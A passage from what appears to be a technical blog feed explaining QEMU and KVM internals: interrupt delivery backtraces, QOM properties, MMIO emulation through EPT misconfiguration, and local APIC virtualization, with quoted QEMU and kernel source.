qemu_cpu_kick(cpu);
}
}
</code></pre></div></div>
<p>This sets ‘cpu->interrupt_request’; on the next guest entry, QEMU will issue the ‘KVM_INTERRUPT’ ioctl to inject the interrupt into the guest.</p>
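<p>A minimal sketch of this request-then-consume handshake follows; the mask value here is illustrative rather than QEMU’s real ‘CPU_INTERRUPT_HARD’ definition, and the consume step is simplified.</p>

```c
#include <assert.h>

#define TOY_INTERRUPT_HARD 0x0002  /* illustrative mask value */

/* kvm_handle_interrupt just ORs a request bit into the vCPU's pending
 * mask; the bit is examined on the next guest entry. */
typedef struct ToyCPU { int interrupt_request; } ToyCPU;

static void toy_handle_interrupt(ToyCPU *cpu, int mask)
{
    cpu->interrupt_request |= mask;   /* remember the pending request */
}

/* On guest entry: if the request bit is set, clear it and report that
 * an interrupt should be injected (via the KVM_INTERRUPT ioctl). */
static int toy_take_interrupt(ToyCPU *cpu, int mask)
{
    if (cpu->interrupt_request & mask) {
        cpu->interrupt_request &= ~mask;
        return 1;
    }
    return 0;
}
```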
<p>Let’s look at a backtrace of interrupt delivery to make this more concrete.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 apic_mem_write (opaque=0x61600000a280, addr=16388, val=33, size=4)
at /home/test/qemu/hw/intc/apic.c:756
#1 0x000055ce1f7241fd in memory_region_write_accessor (mr=0x61600000a300,
addr=16388, value=0x7f329b8f8188, size=4, shift=0, mask=4294967295,
attrs=...) at /home/test/qemu/memory.c:526
#2 0x000055ce1f7244d6 in access_with_adjusted_size (addr=16388,
value=0x7f329b8f8188, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f72404f <memory_region_write_accessor>,
mr=0x61600000a300, attrs=...) at /home/test/qemu/memory.c:593
#3 0x000055ce1f72b2cc in memory_region_dispatch_write (mr=0x61600000a300,
addr=16388, data=33, size=4, attrs=...) at /home/test/qemu/memory.c:1473
#4 0x000055ce1f65021b in address_space_stl_internal (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0, endian=DEVICE_LITTLE_ENDIAN)
at /home/test/qemu/memory_ldst.inc.c:349
#5 0x000055ce1f65047f in address_space_stl_le (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0) at /home/test/qemu/memory_ldst.inc.c:386
#6 0x000055ce1f80aff5 in stl_le_phys (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33)
at /home/test/qemu/include/exec/memory_ldst_phys.inc.h:103
#7 0x000055ce1f80c8af in ioapic_service (s=0x61b000002a80)
at /home/test/qemu/hw/intc/ioapic.c:136
---Type <return> to continue, or q <return> to quit---
#8 0x000055ce1f80cb35 in ioapic_set_irq (opaque=0x61b000002a80, vector=15,
level=1) at /home/test/qemu/hw/intc/ioapic.c:175
#9 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x60600006a880, level=1)
at hw/core/irq.c:45
#10 0x000055ce1f8bfb1c in gsi_handler (opaque=0x612000007540, n=15, level=1)
at /home/test/qemu/hw/i386/pc.c:120
#11 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x6060000414e0, level=1)
at hw/core/irq.c:45
#12 0x000055ce1fc8a0f3 in bmdma_irq (opaque=0x6250001c3e10, n=0, level=1)
at hw/ide/pci.c:222
#13 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x606000091280, level=1)
at hw/core/irq.c:45
#14 0x000055ce1fc7ba3c in qemu_irq_raise (irq=0x606000091280)
at /home/test/qemu/include/hw/irq.h:16
#15 0x000055ce1fc7bb20 in ide_set_irq (bus=0x6250001c32c0)
at /home/test/qemu/include/hw/ide/internal.h:568
#16 0x000055ce1fc7fa75 in ide_atapi_cmd_reply_end (s=0x6250001c3338)
at hw/ide/atapi.c:319
#17 0x000055ce1fc7902c in ide_data_readl (opaque=0x6250001c32c0, addr=368)
at hw/ide/core.c:2389
#18 0x000055ce1f713e32 in portio_read (opaque=0x614000002040, addr=0, size=4)
at /home/test/qemu/ioport.c:180
#19 0x000055ce1f7239bb in memory_region_read_accessor (mr=0x614000002040,
---Type <return> to continue, or q <return> to quit---
addr=0, value=0x7f329b8f8790, size=4, shift=0, mask=4294967295, attrs=...)
at /home/test/qemu/memory.c:435
#20 0x000055ce1f7244d6 in access_with_adjusted_size (addr=0,
value=0x7f329b8f8790, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f723913 <memory_region_read_accessor>, mr=0x614000002040,
attrs=...) at /home/test/qemu/memory.c:593
#21 0x000055ce1f72aa42 in memory_region_dispatch_read1 (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1392
#22 0x000055ce1f72ac25 in memory_region_dispatch_read (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1423
#23 0x000055ce1f64cd0c in flatview_read_continue (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4, addr1=0, l=4, mr=0x614000002040)
at /home/test/qemu/exec.c:3293
#24 0x000055ce1f64d028 in flatview_read (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3331
#25 0x000055ce1f64d0ed in address_space_read_full (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3344
#26 0x000055ce1f64d1c4 in address_space_rw (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4, is_write=false)
---Type <return> to continue, or q <return> to quit---
at /home/test/qemu/exec.c:3374
#27 0x000055ce1f770021 in kvm_handle_io (port=368, attrs=...,
data=0x7f329e50c000, direction=0, size=4, count=2)
at /home/test/qemu/accel/kvm/kvm-all.c:1731
#28 0x000055ce1f7712f9 in kvm_cpu_exec (cpu=0x631000028800)
at /home/test/qemu/accel/kvm/kvm-all.c:1971
#29 0x000055ce1f6e5650 in qemu_kvm_cpu_thread_fn (arg=0x631000028800)
at /home/test/qemu/cpus.c:1257
#30 0x000055ce20354746 in qemu_thread_start (args=0x603000024a60)
at util/qemu-thread-posix.c:504
#31 0x00007f32a175b6db in start_thread (arg=0x7f329b8f9700)
at pthread_create.c:463
#32 0x00007f32a148488f in clone ()
</code></pre></div></div>
QOM Property2018-09-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/05/qom-property
<p>Long ago, I discussed the class-based polymorphism in QOM. I left out one important aspect: properties, which implement a prototype-based polymorphism. Properties are the interface exported to the outside world. Devices can set/get properties statically or dynamically. In this blog I will discuss how a property is stored in QOM and how it interacts with other parts of QEMU.</p>
<h3> Data structure </h3>
<p>Both struct ‘ObjectClass’ and ‘Object’ have a GHashTable ‘properties’ field; the former holds the class-wide properties and the latter the per-object properties.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct ObjectClass
{
/*< private >*/
Type type;
GSList *interfaces;
const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];
ObjectUnparent *unparent;
GHashTable *properties;
};
struct Object
{
/*< private >*/
ObjectClass *class;
ObjectFree *free;
GHashTable *properties;
uint32_t ref;
Object *parent;
};
</code></pre></div></div>
<p>A property is represented by struct ‘ObjectProperty’. It contains the basic information and the getter and setter function pointers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct ObjectProperty
{
gchar *name;
gchar *type;
gchar *description;
ObjectPropertyAccessor *get;
ObjectPropertyAccessor *set;
ObjectPropertyResolve *resolve;
ObjectPropertyRelease *release;
void *opaque;
} ObjectProperty;
</code></pre></div></div>
<p>An ‘ObjectProperty’ is inserted into the ‘properties’ hashtable of either struct ‘ObjectClass’ or ‘Object’.</p>
<p>For every kind of property, there is a concrete struct describing it. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//link property
typedef struct {
Object **child;
void (*check)(const Object *, const char *, Object *, Error **);
ObjectPropertyLinkFlags flags;
} LinkProperty;
//string property
typedef struct StringProperty
{
char *(*get)(Object *, Error **);
void (*set)(Object *, const char *, Error **);
} StringProperty;
//bool property
typedef struct BoolProperty
{
bool (*get)(Object *, Error **);
void (*set)(Object *, bool, Error **);
} BoolProperty;
</code></pre></div></div>
<p>The concrete property is stored in the ‘ObjectProperty’s ‘opaque’ field.
The following picture shows the relation of these structures.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Object
+-----------+
| |
| |
+-----------+
| properties+----------+---------------------------------------------------->
+-----------+ ^
| | |
| | |
+-----------+ +---+----+
| name |
+--------+
| type |
+--------+
| set +-> property_set_bool
+--------+
| get +-> property_get_bool
+--------+
| opaque +----+ +---------+
+--------+ | get +--> memfd_backend_get_seal
ObjectProperty +---------+
| set +--> memfd_backend_set_seal
+---------+
BoolProperty
</code></pre></div></div>
<h3> Interface </h3>
<p>‘object_property_add’ is used to add a property to Object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
ObjectPropertyAccessor *get,
ObjectPropertyAccessor *set,
ObjectPropertyRelease *release,
void *opaque, Error **errp)
{
ObjectProperty *prop;
size_t name_len = strlen(name);
if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) {
int i;
ObjectProperty *ret;
char *name_no_array = g_strdup(name);
name_no_array[name_len - 3] = '\0';
for (i = 0; ; ++i) {
char *full_name = g_strdup_printf("%s[%d]", name_no_array, i);
ret = object_property_add(obj, full_name, type, get, set,
release, opaque, NULL);
g_free(full_name);
if (ret) {
break;
}
}
g_free(name_no_array);
return ret;
}
if (object_property_find(obj, name, NULL) != NULL) {
error_setg(errp, "attempt to add duplicate property '%s'"
" to object (type '%s')", name,
object_get_typename(obj));
return NULL;
}
prop = g_malloc0(sizeof(*prop));
prop->name = g_strdup(name);
prop->type = g_strdup(type);
prop->get = get;
prop->set = set;
prop->release = release;
prop->opaque = opaque;
g_hash_table_insert(obj->properties, prop->name, prop);
return prop;
}
</code></pre></div></div>
<p>It first checks whether a property with this name already exists; if not, it allocates a new ObjectProperty and inserts it into the hashtable. The [*] case is not discussed here.</p>
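<p>The add/find pair can be sketched with a plain linked list standing in for the GHashTable; everything below (‘ToyProp’, ‘toy_property_add’) is hypothetical and only mirrors the duplicate-check-then-insert flow.</p>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Minimal model of object_property_add/object_property_find: a
 * per-object list of (name, type) pairs, with duplicates rejected. */
typedef struct ToyProp {
    char *name;
    char *type;
    struct ToyProp *next;
} ToyProp;

typedef struct ToyObject { ToyProp *props; } ToyObject;

static char *toy_strdup(const char *s)
{
    char *d = malloc(strlen(s) + 1);
    strcpy(d, s);
    return d;
}

static ToyProp *toy_property_find(ToyObject *obj, const char *name)
{
    for (ToyProp *p = obj->props; p; p = p->next)
        if (strcmp(p->name, name) == 0)
            return p;
    return NULL;
}

static ToyProp *toy_property_add(ToyObject *obj, const char *name,
                                 const char *type)
{
    if (toy_property_find(obj, name))
        return NULL;                 /* duplicate property: refuse */
    ToyProp *p = calloc(1, sizeof(*p));
    p->name = toy_strdup(name);
    p->type = toy_strdup(type);
    p->next = obj->props;
    obj->props = p;
    return p;
}
```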
<p>‘object_property_find’ is used to find whether the Object has a given property; it searches the class properties (including those of all parent classes) as well as the object’s own.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *object_property_find(Object *obj, const char *name,
Error **errp)
{
ObjectProperty *prop;
ObjectClass *klass = object_get_class(obj);
prop = object_class_property_find(klass, name, NULL);
if (prop) {
return prop;
}
prop = g_hash_table_lookup(obj->properties, name);
if (prop) {
return prop;
}
error_setg(errp, "Property '.%s' not found", name);
return NULL;
}
</code></pre></div></div>
<h3> Example </h3>
<p>Let’s take ‘TYPE_DEVICE’ as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo device_type_info = {
.name = TYPE_DEVICE,
.parent = TYPE_OBJECT,
.instance_size = sizeof(DeviceState),
.instance_init = device_initfn,
.instance_post_init = device_post_init,
.instance_finalize = device_finalize,
.class_base_init = device_class_base_init,
.class_init = device_class_init,
.abstract = true,
.class_size = sizeof(DeviceClass),
};
</code></pre></div></div>
<p>The instance init function is ‘device_initfn’. In this function several properties, such as ‘realized’ and ‘hotpluggable’, are added.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void device_initfn(Object *obj)
{
DeviceState *dev = DEVICE(obj);
ObjectClass *class;
Property *prop;
if (qdev_hotplug) {
dev->hotplugged = 1;
qdev_hot_added = true;
}
dev->instance_id_alias = -1;
dev->realized = false;
object_property_add_bool(obj, "realized",
device_get_realized, device_set_realized, NULL);
object_property_add_bool(obj, "hotpluggable",
device_get_hotpluggable, NULL, NULL);
object_property_add_bool(obj, "hotplugged",
device_get_hotplugged, NULL,
&error_abort);
class = object_get_class(OBJECT(dev));
do {
for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
qdev_property_add_legacy(dev, prop, &error_abort);
qdev_property_add_static(dev, prop, &error_abort);
}
class = object_class_get_parent(class);
} while (class != object_class_by_name(TYPE_DEVICE));
object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
(Object **)&dev->parent_bus, NULL, 0,
&error_abort);
QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>The setter of ‘realized’ property function is ‘device_set_realized’.</p>
<p>For each device option on the qemu command line, the main function calls ‘device_init_func’, which calls ‘qdev_device_add’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int device_init_func(void *opaque, QemuOpts *opts, Error **errp)
{
Error *err = NULL;
DeviceState *dev;
dev = qdev_device_add(opts, &err);
if (!dev) {
error_report_err(err);
return -1;
}
object_unref(OBJECT(dev));
return 0;
}
</code></pre></div></div>
<p>In ‘qdev_device_add’, ‘object_property_set_bool’ is called to set the ‘realized’ property to true.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> object_property_set_bool(OBJECT(dev), true, "realized", &err);
</code></pre></div></div>
<p>‘object_property_set_bool’ calls ‘object_property_set’; the latter first calls the ObjectProperty’s set function (‘property_set_bool’), and ‘property_set_bool’ in turn calls the BoolProperty’s set function, which is ‘device_set_realized’. So finally ‘device_set_realized’ calls the DeviceClass’s realize function and initializes the device.</p>
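<p>The two-level dispatch (the generic ObjectProperty setter, then the concrete BoolProperty setter stored in ‘opaque’) can be sketched as follows; the ‘Toy*’ types are invented, and the real code goes through QEMU’s visitor API rather than a raw bool.</p>

```c
#include <assert.h>
#include <stdbool.h>

typedef struct ToyDev { bool realized; } ToyDev;

/* Concrete property: the type-specific setter (cf. BoolProperty). */
typedef struct ToyBoolProp {
    void (*set)(ToyDev *dev, bool value);
} ToyBoolProp;

/* Generic property: the generic setter plus the concrete property
 * stashed in opaque (cf. ObjectProperty). */
typedef struct ToyObjProp {
    void (*set)(ToyDev *dev, void *opaque, bool value);
    void *opaque;
} ToyObjProp;

/* Final target, standing in for device_set_realized. */
static void toy_device_set_realized(ToyDev *dev, bool value)
{
    dev->realized = value;   /* real QEMU calls dc->realize() here */
}

/* Generic level, standing in for property_set_bool: unwrap opaque
 * and forward to the concrete setter. */
static void toy_property_set_bool(ToyDev *dev, void *opaque, bool value)
{
    ToyBoolProp *bp = opaque;
    bp->set(dev, value);
}

/* Entry point, standing in for object_property_set_bool. */
static void toy_object_property_set_bool(ToyDev *dev, ToyObjProp *prop,
                                         bool value)
{
    prop->set(dev, prop->opaque, value);
}
```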
KVM MMIO implementation2018-09-03T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
<p>As we already know, we can access devices through PIO and MMIO. For PIO, we can set up the VMCS to intercept the specified port. But how is MMIO emulation implemented? This blog will discuss that.</p>
<p>As a summary, the following shows the process of MMIO emulation:</p>
<ol>
<li>QEMU declares a memory region (but does not allocate ram or commit it to kvm)</li>
<li>The guest first accesses the MMIO address, causing an EPT violation VM-exit</li>
<li>KVM constructs the EPT page table and marks the page table entry with a special mark (110b)</li>
<li>When the guest later accesses this MMIO address, the access is handled by the EPT misconfig VM-exit handler</li>
</ol>
<h3> QEMU part </h3>
<p>QEMU uses the function ‘memory_region_init_io’ to declare an MMIO region. Here we can see that ‘mr->ram’ stays false, so no real memory is allocated (contrast ‘memory_region_init_ram’ below).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_region_init_io(MemoryRegion *mr,
Object *owner,
const MemoryRegionOps *ops,
void *opaque,
const char *name,
uint64_t size)
{
memory_region_init(mr, owner, name, size);
mr->ops = ops ? ops : &unassigned_mem_ops;
mr->opaque = opaque;
mr->terminates = true;
}
void memory_region_init_ram(MemoryRegion *mr,
Object *owner,
const char *name,
uint64_t size,
Error **errp)
{
memory_region_init(mr, owner, name, size);
mr->ram = true;
mr->terminates = true;
mr->destructor = memory_region_destructor_ram;
mr->ram_block = qemu_ram_alloc(size, mr, errp);
mr->dirty_log_mask = tcg_enabled() ? (1 << DIRTY_MEMORY_CODE) : 0;
}
</code></pre></div></div>
<p>When this region is committed to kvm, ‘kvm_region_add’ and then ‘kvm_set_phys_mem’ are called. If the region is not ram, the function just returns, and no memslot is created/updated in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_set_phys_mem(KVMMemoryListener *kml,
MemoryRegionSection *section, bool add)
{
KVMState *s = kvm_state;
KVMSlot *mem, old;
int err;
MemoryRegion *mr = section->mr;
bool writeable = !mr->readonly && !mr->rom_device;
if (!memory_region_is_ram(mr)) {
if (writeable || !kvm_readonly_mem_allowed) {
return;
} else if (!mr->romd_mode) {
/* If the memory device is not in romd_mode, then we actually want
* to remove the kvm memory slot so all accesses will trap. */
add = false;
}
}
}
</code></pre></div></div>
<h3> KVM part </h3>
<p>In ‘vmx_init’, when ept enabled, it calls ‘ept_set_mmio_spte_mask’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ept_set_mmio_spte_mask(void)
{
/*
* EPT Misconfigurations can be generated if the value of bits 2:0
* of an EPT paging-structure entry is 110b (write/execute).
* Also, magic bits (0x3ull << 62) is set to quickly identify mmio
* spte.
*/
kvm_mmu_set_mmio_spte_mask((0x3ull << 62) | 0x6ull);
}
void kvm_mmu_set_mmio_spte_mask(u64 mmio_mask)
{
shadow_mmio_mask = mmio_mask;
}
</code></pre></div></div>
<p>This sets ‘shadow_mmio_mask’.</p>
<p>When the guest accesses the MMIO address, the VM exits due to an EPT violation and ‘tdp_page_fault’ is called; ‘__direct_map’ is then called to construct the EPT page table.</p>
<p>At the end of a long call-chain, ‘mark_mmio_spte’ is called to mark the spte with ‘shadow_mmio_mask’, which as we already know was set during vmx initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__direct_map
-->mmu_set_spte
-->set_spte
-->set_mmio_spte
-->mark_mmio_spte
</code></pre></div></div>
<p>The condition to call ‘mark_mmio_spte’ is ‘is_noslot_pfn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool set_mmio_spte(struct kvm *kvm, u64 *sptep, gfn_t gfn,
pfn_t pfn, unsigned access)
{
if (unlikely(is_noslot_pfn(pfn))) {
mark_mmio_spte(kvm, sptep, gfn, access);
return true;
}
return false;
}
static inline bool is_noslot_pfn(pfn_t pfn)
{
return pfn == KVM_PFN_NOSLOT;
}
</code></pre></div></div>
<p>As we know, QEMU never commits the MMIO memory region, so the pfn is ‘KVM_PFN_NOSLOT’ and the spte is marked with ‘shadow_mmio_mask’.</p>
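<p>The marking and recognition of an MMIO spte boils down to a couple of bit operations. The sketch below uses the mask value from the quoted ‘ept_set_mmio_spte_mask’; the helper shapes are simplified compared with kvm’s real ‘mark_mmio_spte’ and mmio-spte checks.</p>

```c
#include <assert.h>
#include <stdint.h>

/* The EPT misconfig trick: an MMIO SPTE gets the magic bits
 * (0x3ull << 62) plus the write/execute-but-not-read permission bits
 * 110b, so later guest accesses fault with EPT misconfig and KVM can
 * recognize the entry as an MMIO marker. */
static const uint64_t toy_shadow_mmio_mask = (0x3ull << 62) | 0x6ull;

static uint64_t toy_mark_mmio_spte(uint64_t gfn_bits)
{
    return gfn_bits | toy_shadow_mmio_mask;
}

static int toy_is_mmio_spte(uint64_t spte)
{
    return (spte & toy_shadow_mmio_mask) == toy_shadow_mmio_mask;
}
```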
<p>When the guest later accesses this MMIO page, its EPT page table entry being 110b causes a VM exit due to EPT misconfig, since a page can never legitimately be writable/executable without read permission. The handler ‘handle_ept_misconfig’ first processes the MMIO case, which is dispatched to the QEMU side.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_ept_misconfig(struct kvm_vcpu *vcpu)
{
u64 sptes[4];
int nr_sptes, i, ret;
gpa_t gpa;
gpa = vmcs_read64(GUEST_PHYSICAL_ADDRESS);
ret = handle_mmio_page_fault_common(vcpu, gpa, true);
if (likely(ret == RET_MMIO_PF_EMULATE))
return x86_emulate_instruction(vcpu, gpa, 0, NULL, 0) ==
EMULATE_DONE;
if (unlikely(ret == RET_MMIO_PF_INVALID))
return kvm_mmu_page_fault(vcpu, gpa, 0, NULL, 0);
if (unlikely(ret == RET_MMIO_PF_RETRY))
return 1;
/* It is the real ept misconfig */
printk(KERN_ERR "EPT: Misconfiguration.\n");
printk(KERN_ERR "EPT: GPA: 0x%llx\n", gpa);
nr_sptes = kvm_mmu_get_spte_hierarchy(vcpu, gpa, sptes);
for (i = PT64_ROOT_LEVEL; i > PT64_ROOT_LEVEL - nr_sptes; --i)
ept_misconfig_inspect_spte(vcpu, sptes[i-1], i);
vcpu->run->exit_reason = KVM_EXIT_UNKNOWN;
vcpu->run->hw.hardware_exit_reason = EXIT_REASON_EPT_MISCONFIG;
return 0;
}
</code></pre></div></div>
Local APIC virtualization2018-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/29/apicv
<h3> Background </h3>
<p>In the last article, I wrote about software interrupt virtualization: the implementation of pic/ioapic/apic emulation in kvm. We saw that with software emulation, every guest interrupt needs a VM-exit, which is a significant overhead for virtualization. Unsurprisingly, Intel has a solution for this issue, called APIC virtualization.</p>
<p>Before we go to APIC virtualization, we first need to know something about the local APIC. The local APIC and IO APIC are used for interrupt delivery on multi-processor systems. The following picture shows the relation between the IO APIC and the local APICs.</p>
<p><img src="/assets/img/apicv/1.png" alt="" /></p>
<p>In a word, every CPU has an accompanying local APIC (LAPIC), and the IOAPIC is used to dispatch interrupts to the LAPICs.</p>
<h3> LAPIC base address </h3>
<p>Software interacts with the local APIC by reading and writing its registers. APIC registers are memory-mapped to a 4-KByte region of the processor’s physical address space with an initial starting address of FEE00000H. For correct APIC operation, this address space must be mapped to an area of memory that has been designated as strong uncacheable (UC).</p>
<p>Here we should notice that FEE00000H is in the physical address space, not physical memory. What is the difference? The physical address space is seen from the CPU’s perspective. When the CPU reads/writes the APIC registers, the access is handled by the APIC itself, as if intercepted, and never reaches memory. Though there is one LAPIC per CPU core and they all map to the same address, when a CPU reads/writes this address it accesses only its own LAPIC, so there are no conflicts.</p>
<h3> APIC virtualization </h3>
<p>So how is this feature implemented under virtualization? I mean: every VCPU accesses the same physical address but gets the private data belonging to that VCPU. Let’s first look at QEMU’s implementation. In the LAPIC realize function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_realize(DeviceState *dev, Error **errp)
{
APICCommonState *s = APIC(dev);
if (s->id >= MAX_APICS) {
error_setg(errp, "%s initialization failed. APIC ID %d is invalid",
object_get_typename(OBJECT(dev)), s->id);
return;
}
memory_region_init_io(&s->io_memory, OBJECT(s), &apic_io_ops, s, "apic-msi",
APIC_SPACE_SIZE);
s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, apic_timer, s);
local_apics[s->id] = s;
msi_nonbroken = true;
}
</code></pre></div></div>
<p>We can see that the created APIC is stored in a global array, ‘local_apics’. In the access function, we first need to determine which VCPU is accessing the registers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_mem_writel(void *opaque, hwaddr addr, uint32_t val)
{
DeviceState *dev;
APICCommonState *s;
int index = (addr >> 4) & 0xff;
if (addr > 0xfff || !index) {
/* MSI and MMIO APIC are at the same memory location,
* but actually not on the global bus: MSI is on PCI bus
* APIC is connected directly to the CPU.
* Mapping them on the global bus happens to work because
* MSI registers are reserved in APIC MMIO and vice versa. */
MSIMessage msi = { .address = addr, .data = val };
apic_send_msi(&msi);
return;
}
dev = cpu_get_current_apic();
if (!dev) {
return;
}
s = APIC(dev);
}
</code></pre></div></div>
<p>The idea behind QEMU’s implementation is simple: first get the current VCPU and then access its lapic. But how can this be done in APIC virtualization, i.e. how can the CPU implement this without a VM-exit? The secret is the APIC-access page and the virtual-APIC page. Here I will not go into the complicated details of these two VMCS fields. Just treat the virtual-APIC page as the shadow page of the APIC-access page: the APIC-access page is per-VM, while the virtual-APIC page is per-VCPU. With full APIC virtualization, when the guest accesses the APIC-access page, the CPU returns the corresponding data from the virtual-APIC page.</p>
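<p>The effect can be modeled as follows: all VCPUs address the same 4-KByte guest-physical window, but reads and writes are served from the per-VCPU virtual-APIC page. This is only a behavioral sketch of what the hardware does without a VM-exit; the types and helpers are invented.</p>

```c
#include <assert.h>
#include <stdint.h>

#define TOY_APIC_BASE 0xfee00000ull

/* Each vCPU owns a private 4K "virtual-APIC page"; the shared
 * guest-physical window at 0xfee00000 is redirected to it. */
typedef struct ToyVcpu { uint32_t vapic_page[1024]; } ToyVcpu;

static uint32_t toy_apic_read(ToyVcpu *vcpu, uint64_t gpa)
{
    uint64_t off = gpa - TOY_APIC_BASE;  /* offset into the 4K window */
    return vcpu->vapic_page[off / 4];
}

static void toy_apic_write(ToyVcpu *vcpu, uint64_t gpa, uint32_t val)
{
    uint64_t off = gpa - TOY_APIC_BASE;
    vcpu->vapic_page[off / 4] = val;
}
```

The same guest-physical address yields different data depending on which vCPU performs the access, which is exactly the property software emulation achieves with ‘cpu_get_current_apic’.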
<p>The APIC-access page is set in ‘kvm->kvm_arch->apic_access_page’ and allocated in ‘alloc_apic_access_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int alloc_apic_access_page(struct kvm *kvm)
{
struct page *page;
struct kvm_userspace_memory_region kvm_userspace_mem;
int r = 0;
mutex_lock(&kvm->slots_lock);
if (kvm->arch.apic_access_page)
goto out;
kvm_userspace_mem.slot = APIC_ACCESS_PAGE_PRIVATE_MEMSLOT;
kvm_userspace_mem.flags = 0;
kvm_userspace_mem.guest_phys_addr = 0xfee00000ULL;
kvm_userspace_mem.memory_size = PAGE_SIZE;
r = __kvm_set_memory_region(kvm, &kvm_userspace_mem);
if (r)
goto out;
page = gfn_to_page(kvm, 0xfee00);
if (is_error_page(page)) {
r = -EFAULT;
goto out;
}
kvm->arch.apic_access_page = page;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>Here we allocate the memslot for 0xfee00000 and set it as ‘apic_access_page’.
The virtual-APIC page is backed by ‘kvm_lapic->regs’ and is allocated in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_create_lapic(struct kvm_vcpu *vcpu)
{
struct kvm_lapic *apic;
ASSERT(vcpu != NULL);
apic_debug("apic_init %d\n", vcpu->vcpu_id);
apic = kzalloc(sizeof(*apic), GFP_KERNEL);
if (!apic)
goto nomem;
vcpu->arch.apic = apic;
apic->regs = (void *)get_zeroed_page(GFP_KERNEL);
if (!apic->regs) {
printk(KERN_ERR "malloc apic regs error for vcpu %x\n",
vcpu->vcpu_id);
goto nomem_free_apic;
}
apic->vcpu = vcpu;
...
}
</code></pre></div></div>
<p>Then in ‘vmx_vcpu_reset’, it writes the addresses of the APIC-access page and the virtual-APIC page to the VMCS.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_vcpu_reset(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
if (cpu_has_vmx_tpr_shadow()) {
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR, 0);
if (vm_need_tpr_shadow(vmx->vcpu.kvm))
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR,
__pa(vmx->vcpu.arch.apic->regs));
vmcs_write32(TPR_THRESHOLD, 0);
}
if (vm_need_virtualize_apic_accesses(vmx->vcpu.kvm))
vmcs_write64(APIC_ACCESS_ADDR,
page_to_phys(vmx->vcpu.kvm->arch.apic_access_page));
if (vmx_vm_has_apicv(vcpu->kvm))
memset(&vmx->pi_desc, 0, sizeof(struct pi_desc));
if (vmx->vpid != 0)
vmcs_write16(VIRTUAL_PROCESSOR_ID, vmx->vpid);
vpid_sync_context(vmx);
}
</code></pre></div></div>
<p>When the guest accesses an APIC register (from base 0xfee00000), it actually accesses the virtual-APIC page of the corresponding VCPU.</p>
<p>A later article will discuss virtual interrupt delivery in APIC virtualization.</p>
<h3> Reference </h3>
<ol>
<li>Intel SDM</li>
<li>https://software.intel.com/en-us/forums/intel-moderncode-for-parallel-architectures/topic/296237</li>
<li>https://software.intel.com/en-us/forums/virtualization-software-development/topic/284386</li>
</ol>
